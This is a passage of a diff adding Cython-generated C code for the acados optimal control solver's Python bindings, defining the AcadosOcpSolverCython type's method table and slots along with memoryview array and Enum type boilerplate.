CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + Py_CLEAR(p->model_name); + Py_CLEAR(p->nlp_solver_type); + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython[] = { + {"_AcadosOcpSolverCython__get_pointers_solver", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver}, + {"solve", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve}, + {"reset", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset}, + {"set_new_time_steps", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps}, + {"update_qp_solver_cond_N", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N}, + {"eval_param_sens", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens}, + {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get}, + {"print_statistics", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics}, + {"store_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate}, + {"load_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate}, + {"get_stats", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats}, + {"_AcadosOcpSolverCython__get_stat_int", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"_AcadosOcpSolverCython__get_stat_double", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"_AcadosOcpSolverCython__get_stat_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_cost", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost}, + {"get_residuals", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals}, + {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set}, + {"cost_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set}, + {"constraints_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set}, + {"dynamics_get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get}, + {"options_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + {Py_tp_doc, (void *)PyDoc_STR("\n Class to interact with the acados ocp solver C object.\n ")}, + {Py_tp_methods, (void *)__pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + {Py_tp_new, (void *)__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + #if PY_VERSION_HEX >= 0x030400a1 + {Py_tp_finalize, (void *)__pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + #endif + {0, 0}, +}; +static PyType_Spec __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec = { + "acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython", + sizeof(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_slots, +}; +#else + +static PyTypeObject __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""AcadosOcpSolverCython", /*tp_name*/ + sizeof(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + PyDoc_STR("\n Class to interact with the acados ocp solver C object.\n "), /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + __pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_array __pyx_vtable_array; + +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_array_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_array_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_array; + p->mode = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->_format = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_array___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_array(PyObject *o) { + struct __pyx_array_obj *p = (struct __pyx_array_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_array) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_array___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->mode); + Py_CLEAR(p->_format); + (*Py_TYPE(o)->tp_free)(o); +} +static PyObject *__pyx_sq_item_array(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_array(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_array___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_tp_getattro_array(PyObject *o, PyObject *n) { + PyObject *v = __Pyx_PyObject_GenericGetAttr(o, n); + if (!v && PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + v = __pyx_array___getattr__(o, n); + } + return v; +} + +static PyObject *__pyx_getprop___pyx_array_memview(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(o); +} + +static PyMethodDef __pyx_methods_array[] = { + {"__getattr__", (PyCFunction)__pyx_array___getattr__, METH_O|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_array[] = { + {(char *)"memview", __pyx_getprop___pyx_array_memview, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_array_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_array}, + {Py_sq_length, (void *)__pyx_array___len__}, + {Py_sq_item, (void *)__pyx_sq_item_array}, + {Py_mp_length, (void *)__pyx_array___len__}, + {Py_mp_subscript, (void *)__pyx_array___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_array}, + {Py_tp_getattro, (void *)__pyx_tp_getattro_array}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_array_getbuffer}, + #endif + {Py_tp_methods, (void *)__pyx_methods_array}, + {Py_tp_getset, (void *)__pyx_getsets_array}, + {Py_tp_new, (void *)__pyx_tp_new_array}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_array_spec = { + "acados_template.acados_ocp_solver_pyx.array", + sizeof(struct __pyx_array_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_array_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_array = { + __pyx_array___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_array, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_array = { + __pyx_array___len__, /*mp_length*/ + __pyx_array___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_array, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_array = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""array", /*tp_name*/ + sizeof(struct __pyx_array_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_array, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_array, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_array, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + __pyx_tp_getattro_array, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_array, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_array, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_array, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_array, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_MemviewEnum_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_MemviewEnum_obj *)o); + p->name = Py_None; Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_Enum(PyObject *o) { + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_Enum) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->name); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_Enum(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + if (p->name) { + e = (*v)(p->name, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_Enum(PyObject *o) { + PyObject* tmp; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + tmp = ((PyObject*)p->name); + p->name = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_specialmethod___pyx_MemviewEnum___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_MemviewEnum___repr__(self); +} + +static PyMethodDef __pyx_methods_Enum[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_MemviewEnum___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_MemviewEnum_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_Enum}, + {Py_tp_repr, (void *)__pyx_MemviewEnum___repr__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_Enum}, + {Py_tp_clear, (void *)__pyx_tp_clear_Enum}, + {Py_tp_methods, (void *)__pyx_methods_Enum}, + {Py_tp_init, (void *)__pyx_MemviewEnum___init__}, + {Py_tp_new, (void *)__pyx_tp_new_Enum}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_MemviewEnum_spec = { + "acados_template.acados_ocp_solver_pyx.Enum", + sizeof(struct __pyx_MemviewEnum_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_MemviewEnum_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_MemviewEnum = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""Enum", /*tp_name*/ + sizeof(struct __pyx_MemviewEnum_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_Enum, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_MemviewEnum___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_Enum, /*tp_traverse*/ + __pyx_tp_clear_Enum, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_Enum, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_MemviewEnum___init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_Enum, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + 